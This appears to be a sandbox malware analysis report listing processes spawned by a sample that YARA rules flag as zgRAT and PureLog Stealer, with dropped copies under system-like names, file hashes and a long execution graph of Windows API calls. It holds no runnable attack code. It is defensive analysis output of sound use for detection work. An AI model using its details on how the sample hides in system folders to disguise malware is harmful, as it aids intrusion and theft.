                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                          Imagebase:0x7ff7e52b0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:73
                                                                                                          Start time:11:13:02
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\apppatch\CustomSDB\sihost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\apppatch\CustomSDB\sihost.exe"
                                                                                                          Imagebase:0xfe0000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\apppatch\CustomSDB\sihost.exe, Author: Joe Security
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Has exited:true

                                                                                                          Target ID:76
                                                                                                          Start time:11:13:21
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe"
                                                                                                          Imagebase:0xd80000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:77
                                                                                                          Start time:11:13:29
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0x480000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:78
                                                                                                          Start time:11:13:38
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0xab0000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:79
                                                                                                          Start time:11:13:46
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\apppatch\CustomSDB\sihost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\apppatch\CustomSDB\sihost.exe"
                                                                                                          Imagebase:0xe50000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:81
                                                                                                          Start time:11:14:03
                                                                                                          Start date:08/01/2025
                                                                                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe"
                                                                                                          Imagebase:0x900000
                                                                                                          File size:2'025'984 bytes
                                                                                                          MD5 hash:77967721CE1C8B3F0EB800BD33527897
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Reset < >
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2062010918.00007FF848F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f80000_wxl1r0lntg.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f22e9abb4195ae8ed5872303c1f42b24df5a2bac9de1220b8cd6266a9ab22a1
                                                                                                            • Instruction ID: 8cdba847b150fb4c388e35798fad8d7b376b5d7f626e69450e78387ab2d5b117
                                                                                                            • Opcode Fuzzy Hash: 8f22e9abb4195ae8ed5872303c1f42b24df5a2bac9de1220b8cd6266a9ab22a1
                                                                                                            • Instruction Fuzzy Hash: AFA17161A1EBC84FE747A73858655787BA1EF97640F8900F7E489CB2E3DE285C05C326

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.5%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:9.5%
                                                                                                            Total number of Nodes:1502
                                                                                                            Total number of Limit Nodes:40
                                                                                                            execution_graph 25408 cd62ca 123 API calls __InternalCxxFrameHandler 25456 cdb5c0 100 API calls 25457 cd77c0 118 API calls 25458 cdffc0 RaiseException _com_error::_com_error CallUnexpected 23539 cddec2 23540 cddecf 23539->23540 23547 cce617 23540->23547 23548 cce627 23547->23548 23559 cce648 23548->23559 23551 cc4092 23582 cc4065 23551->23582 23554 cdb568 PeekMessageW 23555 cdb5bc 23554->23555 23556 cdb583 GetMessageW 23554->23556 23557 cdb599 IsDialogMessageW 23556->23557 23558 cdb5a8 TranslateMessage DispatchMessageW 23556->23558 23557->23555 23557->23558 23558->23555 23565 ccd9b0 23559->23565 23562 cce66b LoadStringW 23563 cce645 23562->23563 23564 cce682 LoadStringW 23562->23564 23563->23551 23564->23563 23570 ccd8ec 23565->23570 23567 ccd9cd 23568 ccd9e2 23567->23568 23578 ccd9f0 26 API calls 23567->23578 23568->23562 23568->23563 23571 ccd904 23570->23571 23577 ccd984 _strncpy 23570->23577 23572 ccd928 23571->23572 23579 cd1da7 WideCharToMultiByte 23571->23579 23574 ccd959 23572->23574 23580 cce5b1 50 API calls __vsnprintf 23572->23580 23581 ce6159 26 API calls 3 library calls 23574->23581 23577->23567 23578->23568 23579->23572 23580->23574 23581->23577 23583 cc407c __vsnwprintf_l 23582->23583 23586 ce5fd4 23583->23586 23589 ce4097 23586->23589 23590 ce40bf 23589->23590 23591 ce40d7 23589->23591 23613 ce91a8 20 API calls __dosmaperr 23590->23613 23591->23590 23593 ce40df 23591->23593 23615 ce4636 23593->23615 23594 ce40c4 23614 ce9087 26 API calls __cftof 23594->23614 23600 ce4167 23624 ce49e6 51 API calls 3 library calls 23600->23624 23601 cc4086 SetDlgItemTextW 23601->23554 23603 ce4172 23625 ce46b9 20 API calls _free 23603->23625 23605 ce40cf 23606 cdfbbc 23605->23606 23607 cdfbc5 IsProcessorFeaturePresent 23606->23607 23608 cdfbc4 23606->23608 23610 cdfc07 23607->23610 23608->23601 23626 cdfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23610->23626 23612 cdfcea 23612->23601 23613->23594 23614->23605 23616 ce4653 23615->23616 23622 ce40ef 23615->23622 23616->23622 23627 ce97e5 GetLastError 23616->23627 23618 ce4674 23647 ce993a 38 API calls __cftof 23618->23647 23620 ce468d 23648 ce9967 38 API calls __cftof 23620->23648 23623 ce4601 20 API calls 2 library calls 23622->23623 23623->23600 23624->23603 23625->23605 23626->23612 23628 ce97fb 23627->23628 23629 ce9801 23627->23629 23649 ceae5b 11 API calls 2 library calls 23628->23649 23633 ce9850 SetLastError 23629->23633 23650 ceb136 23629->23650 23633->23618 23634 ce981b 23657 ce8dcc 23634->23657 23637 ce9830 23637->23634 23639 ce9837 23637->23639 23638 ce9821 23640 ce985c SetLastError 23638->23640 23664 ce9649 20 API calls _unexpected 23639->23664 23665 ce8d24 38 API calls _abort 23640->23665 23643 ce9842 23645 ce8dcc _free 20 API calls 23643->23645 23646 ce9849 23645->23646 23646->23633 23646->23640 23647->23620 23648->23622 23649->23629 23656 ceb143 _unexpected 23650->23656 23651 ceb183 23667 ce91a8 20 API calls __dosmaperr 23651->23667 23652 ceb16e RtlAllocateHeap 23654 ce9813 23652->23654 23652->23656 23654->23634 23663 ceaeb1 11 API calls 2 library calls 23654->23663 23656->23651 23656->23652 23666 ce7a5e 7 API calls 2 library calls 23656->23666 23658 ce8dd7 RtlFreeHeap 23657->23658 23659 ce8e00 __dosmaperr 23657->23659 23658->23659 23660 ce8dec 23658->23660 23659->23638 23668 ce91a8 20 API calls __dosmaperr 23660->23668 23662 ce8df2 GetLastError 23662->23659 23663->23637 23664->23643 23666->23656 23667->23654 23668->23662 25409 ce0ada 51 API calls 2 library calls 23778 cc10d5 23783 cc5abd 23778->23783 23784 cc5ac7 __EH_prolog 23783->23784 23790 ccb505 23784->23790 23786 cc5ad3 23796 cc5cac GetCurrentProcess GetProcessAffinityMask 23786->23796 23791 ccb50f __EH_prolog 23790->23791 23797 ccf1d0 82 API calls 23791->23797 23793 ccb521 23798 ccb61e 23793->23798 23797->23793 23799 ccb630 __cftof 23798->23799 23802 cd10dc 23799->23802 23805 cd109e GetCurrentProcess GetProcessAffinityMask 23802->23805 23806 ccb597 23805->23806 23806->23786 23807 cde2d7 23809 cde1db 23807->23809 23808 cde85d ___delayLoadHelper2@8 14 API calls 23808->23809 23809->23808 23810 cde1d1 14 API calls ___delayLoadHelper2@8 25410 cdf4d3 20 API calls 25460 cea3d0 21 API calls 2 library calls 25461 cf2bd0 VariantClear 25463 ccf1e8 FreeLibrary 23820 cdeae7 23821 cdeaf1 23820->23821 23822 cde85d ___delayLoadHelper2@8 14 API calls 23821->23822 23823 cdeafe 23822->23823 25412 cdf4e7 29 API calls _abort 23824 cdb7e0 23825 cdb7ea __EH_prolog 23824->23825 23992 cc1316 23825->23992 23828 cdbf0f 24064 cdd69e 23828->24064 23829 cdb82a 23832 cdb838 23829->23832 23833 cdb89b 23829->23833 23907 cdb841 23829->23907 23834 cdb83c 23832->23834 23835 cdb878 23832->23835 23838 cdb92e GetDlgItemTextW 23833->23838 23842 cdb8b1 23833->23842 23843 cce617 53 API calls 23834->23843 23834->23907 23845 cdb95f KiUserCallbackDispatcher 23835->23845 23835->23907 23836 cdbf38 23839 cdbf41 SendDlgItemMessageW 23836->23839 23840 cdbf52 GetDlgItem SendMessageW 23836->23840 23837 cdbf2a SendMessageW 23837->23836 23838->23835 23841 cdb96b 23838->23841 23839->23840 24082 cda64d GetCurrentDirectoryW 23840->24082 23846 cdb980 GetDlgItem 23841->23846 23990 cdb974 23841->23990 23847 cce617 53 API calls 23842->23847 23848 cdb85b 23843->23848 23845->23907 23850 cdb994 SendMessageW SendMessageW 23846->23850 23851 cdb9b7 SetFocus 23846->23851 23852 cdb8ce SetDlgItemTextW 23847->23852 24102 cc124f SHGetMalloc 23848->24102 23849 cdbf82 GetDlgItem 23856 cdbf9f 23849->23856 23857 cdbfa5 SetWindowTextW 23849->23857 23850->23851 23853 cdb9c7 23851->23853 23867 cdb9e0 23851->23867 23854 cdb8d9 23852->23854 23858 cce617 53 API calls 23853->23858 23861 cdb8e6 GetMessageW 23854->23861 23854->23907 23856->23857 24083 cdabab GetClassNameW 23857->24083 23862 cdb9d1 23858->23862 23859 cdbe55 23863 cce617 53 API calls 23859->23863 23865 cdb8fd IsDialogMessageW 23861->23865 23861->23907 24103 cdd4d4 23862->24103 23869 cdbe65 SetDlgItemTextW 23863->23869 23865->23854 23871 cdb90c TranslateMessage DispatchMessageW 23865->23871 23874 cce617 53 API calls 23867->23874 23868 cdc1fc SetDlgItemTextW 23868->23907 23872 cdbe79 23869->23872 23871->23854 23877 cce617 53 API calls 23872->23877 23876 cdba17 23874->23876 23875 cdbff0 23881 cdc020 23875->23881 23884 cce617 53 API calls 23875->23884 23882 cc4092 _swprintf 51 API calls 23876->23882 23910 cdbe9c _wcslen 23877->23910 23878 cdb9d9 24002 cca0b1 23878->24002 23879 cdc73f 97 API calls 23879->23875 23889 cdc73f 97 API calls 23881->23889 23913 cdc0d8 23881->23913 23885 cdba29 23882->23885 23888 cdc003 SetDlgItemTextW 23884->23888 23891 cdd4d4 16 API calls 23885->23891 23886 cdba68 GetLastError 23887 cdba73 23886->23887 24008 cdac04 SetCurrentDirectoryW 23887->24008 23895 cce617 53 API calls 23888->23895 23897 cdc03b 23889->23897 23890 cdc18b 23892 cdc19d 23890->23892 23893 cdc194 EnableWindow 23890->23893 23891->23878 23898 cdc1ba 23892->23898 24121 cc12d3 GetDlgItem EnableWindow 23892->24121 23893->23892 23894 cdbeed 23901 cce617 53 API calls 23894->23901 23899 cdc017 SetDlgItemTextW 23895->23899 23908 cdc04d 23897->23908 23934 cdc072 23897->23934 23904 cdc1e1 23898->23904 23919 cdc1d9 SendMessageW 23898->23919 23899->23881 23900 cdba87 23905 cdba9e 23900->23905 23906 cdba90 GetLastError 23900->23906 23901->23907 23902 cdc0cb 23911 cdc73f 97 API calls 23902->23911 23904->23907 23920 cce617 53 API calls 23904->23920 23916 cdbb20 23905->23916 23921 cdbaae GetTickCount 23905->23921 23966 cdbb11 23905->23966 23906->23905 24119 cd9ed5 32 API calls 23908->24119 23909 cdc1b0 24122 cc12d3 GetDlgItem EnableWindow 23909->24122 23910->23894 23914 cce617 53 API calls 23910->23914 23911->23913 23913->23890 23925 cdc169 23913->23925 23936 cce617 53 API calls 23913->23936 23924 cdbed0 23914->23924 23915 cdbd56 24024 cc12f1 GetDlgItem ShowWindow 23915->24024 23926 cdbcfb 23916->23926 23927 cdbb39 GetModuleFileNameW 23916->23927 23928 cdbcf1 23916->23928 23917 cdc066 23917->23934 23919->23904 23922 cdb862 23920->23922 23923 cc4092 _swprintf 51 API calls 23921->23923 23922->23868 23922->23907 23943 cdbac7 23923->23943 23930 cc4092 _swprintf 51 API calls 23924->23930 24120 cd9ed5 32 API calls 23925->24120 23933 cce617 53 API calls 23926->23933 24113 ccf28c 82 API calls 23927->24113 23928->23835 23928->23926 23930->23894 23939 cdbd05 23933->23939 23934->23902 23940 cdc73f 97 API calls 23934->23940 23935 cdbd66 24025 cc12f1 GetDlgItem ShowWindow 23935->24025 23936->23913 23937 cdc188 23937->23890 23938 cdbb5f 23944 cc4092 _swprintf 51 API calls 23938->23944 23945 cc4092 _swprintf 51 API calls 23939->23945 23946 cdc0a0 23940->23946 23942 cdbd70 23947 cce617 53 API calls 23942->23947 24009 cc966e 23943->24009 23949 cdbb81 CreateFileMappingW 23944->23949 23950 cdbd23 23945->23950 23946->23902 23951 cdc0a9 DialogBoxParamW 23946->23951 23952 cdbd7a SetDlgItemTextW 23947->23952 23954 cdbbe3 GetCommandLineW 23949->23954 23986 cdbc60 __InternalCxxFrameHandler 23949->23986 23963 cce617 53 API calls 23950->23963 23951->23835 23951->23902 24026 cc12f1 GetDlgItem ShowWindow 23952->24026 23953 cdbaed 23957 cdbaf4 GetLastError 23953->23957 23958 cdbaff 23953->23958 23959 cdbbf4 23954->23959 23955 cdbc6b ShellExecuteExW 23981 cdbc88 23955->23981 23957->23958 24017 cc959a 23958->24017 24114 cdb425 SHGetMalloc 23959->24114 23960 cdbd8c SetDlgItemTextW GetDlgItem 23964 cdbda9 GetWindowLongW SetWindowLongW 23960->23964 23965 cdbdc1 23960->23965 23968 cdbd3d 23963->23968 23964->23965 24027 cdc73f 23965->24027 23966->23915 23966->23916 23967 cdbc10 24115 cdb425 SHGetMalloc 23967->24115 23972 cdbc1c 24116 cdb425 SHGetMalloc 23972->24116 23973 cdbccb 23973->23928 23979 cdbce1 UnmapViewOfFile CloseHandle 23973->23979 23974 cdc73f 97 API calls 23976 cdbddd 23974->23976 24052 cdda52 23976->24052 23977 cdbc28 24117 ccf3fa 82 API calls 2 library calls 23977->24117 23979->23928 23981->23973 23984 cdbcb7 Sleep 23981->23984 23983 cdbc3f MapViewOfFile 23983->23986 23984->23973 23984->23981 23985 cdc73f 97 API calls 23989 cdbe03 23985->23989 23986->23955 23987 cdbe2c 24118 cc12d3 GetDlgItem EnableWindow 23987->24118 23989->23987 23991 cdc73f 97 API calls 23989->23991 23990->23835 23990->23859 23991->23987 23993 cc131f 23992->23993 23994 cc1378 23992->23994 23995 cc1385 23993->23995 24123 cce2e8 62 API calls 2 library calls 23993->24123 24124 cce2c1 GetWindowLongW SetWindowLongW 23994->24124 23995->23828 23995->23829 23995->23907 23998 cc1341 23998->23995 23999 cc1354 GetDlgItem 23998->23999 23999->23995 24000 cc1364 23999->24000 24000->23995 24001 cc136a SetWindowTextW 24000->24001 24001->23995 24005 cca0bb 24002->24005 24003 cca14c 24004 cca2b2 8 API calls 24003->24004 24006 cca175 24003->24006 24004->24006 24005->24003 24005->24006 24125 cca2b2 24005->24125 24006->23886 24006->23887 24008->23900 24010 cc9678 24009->24010 24011 cc96d5 CreateFileW 24010->24011 24012 cc96c9 24010->24012 24011->24012 24013 cc971f 24012->24013 24014 ccbb03 GetCurrentDirectoryW 24012->24014 24013->23953 24015 cc9704 24014->24015 24015->24013 24016 cc9708 CreateFileW 24015->24016 24016->24013 24018 cc95be 24017->24018 24019 cc95cf 24017->24019 24018->24019 24020 cc95ca 24018->24020 24021 cc95d1 24018->24021 24019->23966 24146 cc974e 24020->24146 24151 cc9620 24021->24151 24024->23935 24025->23942 24026->23960 24028 cdc749 __EH_prolog 24027->24028 24029 cdbdcf 24028->24029 24030 cdb314 ExpandEnvironmentStringsW 24028->24030 24029->23974 24035 cdc780 _wcslen _wcsrchr 24030->24035 24032 cdb314 ExpandEnvironmentStringsW 24032->24035 24033 cdca67 SetWindowTextW 24033->24035 24035->24029 24035->24032 24035->24033 24037 ce3e3e 22 API calls 24035->24037 24039 cdc855 SetFileAttributesW 24035->24039 24044 cdcc31 GetDlgItem SetWindowTextW SendMessageW 24035->24044 24048 cdcc71 SendMessageW 24035->24048 24166 cd1fbb CompareStringW 24035->24166 24167 cda64d GetCurrentDirectoryW 24035->24167 24169 cca5d1 6 API calls 24035->24169 24170 cca55a FindClose 24035->24170 24171 cdb48e 76 API calls 2 library calls 24035->24171 24037->24035 24041 cdc90f GetFileAttributesW 24039->24041 24051 cdc86f __cftof _wcslen 24039->24051 24041->24035 24043 cdc921 DeleteFileW 24041->24043 24043->24035 24045 cdc932 24043->24045 24044->24035 24046 cc4092 _swprintf 51 API calls 24045->24046 24047 cdc952 GetFileAttributesW 24046->24047 24047->24045 24049 cdc967 MoveFileW 24047->24049 24048->24035 24049->24035 24050 cdc97f MoveFileExW 24049->24050 24050->24035 24051->24035 24051->24041 24168 ccb991 51 API calls 2 library calls 24051->24168 24053 cdda5c __EH_prolog 24052->24053 24172 cd0659 24053->24172 24055 cdda8d 24176 cc5b3d 24055->24176 24057 cddaab 24180 cc7b0d 24057->24180 24061 cddafe 24196 cc7b9e 24061->24196 24063 cdbdee 24063->23985 24065 cdd6a8 24064->24065 24674 cda5c6 24065->24674 24068 cdd6b5 GetWindow 24069 cdbf15 24068->24069 24072 cdd6d5 24068->24072 24069->23836 24069->23837 24070 cdd6e2 GetClassNameW 24679 cd1fbb CompareStringW 24070->24679 24072->24069 24072->24070 24073 cdd76a GetWindow 24072->24073 24074 cdd706 GetWindowLongW 24072->24074 24073->24069 24073->24072 24074->24073 24075 cdd716 SendMessageW 24074->24075 24075->24073 24076 cdd72c GetObjectW 24075->24076 24680 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24076->24680 24078 cdd743 24681 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24078->24681 24682 cda80c 8 API calls 24078->24682 24081 cdd754 SendMessageW DeleteObject 24081->24073 24082->23849 24084 cdabcc 24083->24084 24085 cdabf1 24083->24085 24685 cd1fbb CompareStringW 24084->24685 24089 cdb093 24085->24089 24087 cdabdf 24087->24085 24088 cdabe3 FindWindowExW 24087->24088 24088->24085 24090 cdb09d __EH_prolog 24089->24090 24091 cc13dc 84 API calls 24090->24091 24092 cdb0bf 24091->24092 24686 cc1fdc 24092->24686 24095 cdb0d9 24097 cc1692 86 API calls 24095->24097 24096 cdb0eb 24098 cc19af 128 API calls 24096->24098 24099 cdb0e4 24097->24099 24101 cdb10d __InternalCxxFrameHandler ___std_exception_copy 24098->24101 24099->23875 24099->23879 24100 cc1692 86 API calls 24100->24099 24101->24100 24102->23922 24104 cdb568 5 API calls 24103->24104 24105 cdd4e0 GetDlgItem 24104->24105 24106 cdd536 SendMessageW SendMessageW 24105->24106 24107 cdd502 24105->24107 24108 cdd591 SendMessageW SendMessageW SendMessageW 24106->24108 24109 cdd572 24106->24109 24112 cdd50d ShowWindow SendMessageW SendMessageW 24107->24112 24110 cdd5c4 SendMessageW 24108->24110 24111 cdd5e7 SendMessageW 24108->24111 24109->24108 24110->24111 24111->23878 24112->24106 24113->23938 24114->23967 24115->23972 24116->23977 24117->23983 24118->23990 24119->23917 24120->23937 24121->23909 24122->23898 24123->23998 24124->23995 24126 cca2bf 24125->24126 24127 cca2e3 24126->24127 24129 cca2d6 CreateDirectoryW 24126->24129 24128 cca231 3 API calls 24127->24128 24131 cca2e9 24128->24131 24129->24127 24130 cca316 24129->24130 24133 cca325 24130->24133 24138 cca4ed 24130->24138 24132 cca329 GetLastError 24131->24132 24134 ccbb03 GetCurrentDirectoryW 24131->24134 24132->24133 24133->24005 24136 cca2ff 24134->24136 24136->24132 24137 cca303 CreateDirectoryW 24136->24137 24137->24130 24137->24132 24139 cdec50 24138->24139 24140 cca4fa SetFileAttributesW 24139->24140 24141 cca53d 24140->24141 24142 cca510 24140->24142 24141->24133 24143 ccbb03 GetCurrentDirectoryW 24142->24143 24144 cca524 24143->24144 24144->24141 24145 cca528 SetFileAttributesW 24144->24145 24145->24141 24147 cc9781 24146->24147 24150 cc9757 24146->24150 24147->24019 24150->24147 24157 cca1e0 24150->24157 24152 cc962c 24151->24152 24153 cc964a 24151->24153 24152->24153 24155 cc9638 CloseHandle 24152->24155 24154 cc9669 24153->24154 24165 cc6bd5 76 API calls 24153->24165 24154->24019 24155->24153 24158 cdec50 24157->24158 24159 cca1ed DeleteFileW 24158->24159 24160 cc977f 24159->24160 24161 cca200 24159->24161 24160->24019 24162 ccbb03 GetCurrentDirectoryW 24161->24162 24163 cca214 24162->24163 24163->24160 24164 cca218 DeleteFileW 24163->24164 24164->24160 24165->24154 24166->24035 24167->24035 24168->24051 24169->24035 24170->24035 24171->24035 24173 cd0666 _wcslen 24172->24173 24200 cc17e9 24173->24200 24175 cd067e 24175->24055 24177 cd0659 _wcslen 24176->24177 24178 cc17e9 78 API calls 24177->24178 24179 cd067e 24178->24179 24179->24057 24181 cc7b17 __EH_prolog 24180->24181 24217 ccce40 24181->24217 24183 cc7b32 24223 cdeb38 24183->24223 24185 cc7b5c 24232 cd4a76 24185->24232 24188 cc7c7d 24189 cc7c87 24188->24189 24191 cc7cf1 24189->24191 24264 cca56d 24189->24264 24193 cc7d50 24191->24193 24242 cc8284 24191->24242 24192 cc7d92 24192->24061 24193->24192 24270 cc138b 74 API calls 24193->24270 24197 cc7bac 24196->24197 24199 cc7bb3 24196->24199 24198 cd2297 86 API calls 24197->24198 24198->24199 24201 cc17ff 24200->24201 24212 cc185a __InternalCxxFrameHandler 24200->24212 24202 cc1828 24201->24202 24213 cc6c36 76 API calls __vswprintf_c_l 24201->24213 24204 cc1887 24202->24204 24209 cc1847 ___std_exception_copy 24202->24209 24206 ce3e3e 22 API calls 24204->24206 24205 cc181e 24214 cc6ca7 75 API calls 24205->24214 24208 cc188e 24206->24208 24208->24212 24216 cc6ca7 75 API calls 24208->24216 24209->24212 24215 cc6ca7 75 API calls 24209->24215 24212->24175 24213->24205 24214->24202 24215->24212 24216->24212 24218 ccce4a __EH_prolog 24217->24218 24219 cdeb38 8 API calls 24218->24219 24220 ccce8d 24219->24220 24221 cdeb38 8 API calls 24220->24221 24222 ccceb1 24221->24222 24222->24183 24224 cdeb3d ___std_exception_copy 24223->24224 24225 cdeb57 24224->24225 24228 cdeb59 24224->24228 24238 ce7a5e 7 API calls 2 library calls 24224->24238 24225->24185 24227 cdf5c9 24240 ce238d RaiseException 24227->24240 24228->24227 24239 ce238d RaiseException 24228->24239 24231 cdf5e6 24233 cd4a80 __EH_prolog 24232->24233 24234 cdeb38 8 API calls 24233->24234 24235 cd4a9c 24234->24235 24236 cc7b8b 24235->24236 24241 cd0e46 80 API calls 24235->24241 24236->24188 24238->24224 24239->24227 24240->24231 24241->24236 24243 cc828e __EH_prolog 24242->24243 24271 cc13dc 24243->24271 24245 cc82aa 24246 cc82bb 24245->24246 24411 cc9f42 24245->24411 24251 cc82f2 24246->24251 24279 cc1a04 24246->24279 24407 cc1692 24251->24407 24252 cc8389 24298 cc8430 24252->24298 24256 cc83e8 24303 cc1f6d 24256->24303 24257 cc82ee 24257->24251 24257->24252 24262 cca56d 7 API calls 24257->24262 24415 ccc0c5 CompareStringW _wcslen 24257->24415 24260 cc83f3 24260->24251 24307 cc3b2d 24260->24307 24319 cc848e 24260->24319 24262->24257 24265 cca582 24264->24265 24269 cca5b0 24265->24269 24663 cca69b 24265->24663 24267 cca592 24268 cca597 FindClose 24267->24268 24267->24269 24268->24269 24269->24189 24270->24192 24272 cc13e1 __EH_prolog 24271->24272 24273 ccce40 8 API calls 24272->24273 24274 cc1419 24273->24274 24275 cdeb38 8 API calls 24274->24275 24278 cc1474 __cftof 24274->24278 24276 cc1461 24275->24276 24277 ccb505 84 API calls 24276->24277 24276->24278 24277->24278 24278->24245 24280 cc1a0e __EH_prolog 24279->24280 24292 cc1a61 24280->24292 24295 cc1b9b 24280->24295 24417 cc13ba 24280->24417 24282 cc1bc7 24429 cc138b 74 API calls 24282->24429 24285 cc3b2d 101 API calls 24289 cc1c12 24285->24289 24286 cc1bd4 24286->24285 24286->24295 24287 cc1c5a 24291 cc1c8d 24287->24291 24287->24295 24430 cc138b 74 API calls 24287->24430 24289->24287 24290 cc3b2d 101 API calls 24289->24290 24290->24289 24291->24295 24296 cc9e80 79 API calls 24291->24296 24292->24282 24292->24286 24292->24295 24293 cc3b2d 101 API calls 24294 cc1cde 24293->24294 24294->24293 24294->24295 24295->24257 24296->24294 24450 cccf3d 24298->24450 24300 cc8440 24454 cd13d2 GetSystemTime SystemTimeToFileTime 24300->24454 24302 cc83a3 24302->24256 24416 cd1b66 72 API calls 24302->24416 24304 cc1f72 __EH_prolog 24303->24304 24306 cc1fa6 24304->24306 24459 cc19af 24304->24459 24306->24260 24308 cc3b3d 24307->24308 24309 cc3b39 24307->24309 24318 cc9e80 79 API calls 24308->24318 24309->24260 24310 cc3b4f 24311 cc3b78 24310->24311 24312 cc3b6a 24310->24312 24590 cc286b 101 API calls 3 library calls 24311->24590 24314 cc3baa 24312->24314 24589 cc32f7 89 API calls 2 library calls 24312->24589 24314->24260 24316 cc3b76 24316->24314 24591 cc20d7 74 API calls 24316->24591 24318->24310 24320 cc8498 __EH_prolog 24319->24320 24323 cc84d5 24320->24323 24330 cc8513 24320->24330 24616 cd8c8d 103 API calls 24320->24616 24322 cc84f5 24324 cc851c 24322->24324 24325 cc84fa 24322->24325 24323->24322 24328 cc857a 24323->24328 24323->24330 24324->24330 24618 cd8c8d 103 API calls 24324->24618 24325->24330 24617 cc7a0d 152 API calls 24325->24617 24328->24330 24592 cc5d1a 24328->24592 24330->24260 24331 cc8605 24331->24330 24598 cc8167 24331->24598 24334 cc8797 24335 cca56d 7 API calls 24334->24335 24338 cc8802 24334->24338 24335->24338 24337 ccd051 82 API calls 24344 cc885d 24337->24344 24604 cc7c0d 24338->24604 24339 cc898b 24621 cc2021 74 API calls 24339->24621 24340 cc8992 24341 cc8a5f 24340->24341 24346 cc89e1 24340->24346 24345 cc8ab6 24341->24345 24358 cc8a6a 24341->24358 24344->24330 24344->24337 24344->24339 24344->24340 24619 cc8117 84 API calls 24344->24619 24620 cc2021 74 API calls 24344->24620 24353 cc8a4c 24345->24353 24624 cc7fc0 97 API calls 24345->24624 24350 cca231 3 API calls 24346->24350 24346->24353 24355 cc8b14 24346->24355 24347 cc9105 24352 cc959a 80 API calls 24347->24352 24348 cc8ab4 24349 cc959a 80 API calls 24348->24349 24349->24330 24354 cc8a19 24350->24354 24352->24330 24353->24348 24353->24355 24354->24353 24622 cc92a3 97 API calls 24354->24622 24355->24347 24367 cc8b82 24355->24367 24625 cc98bc 24355->24625 24356 ccab1a 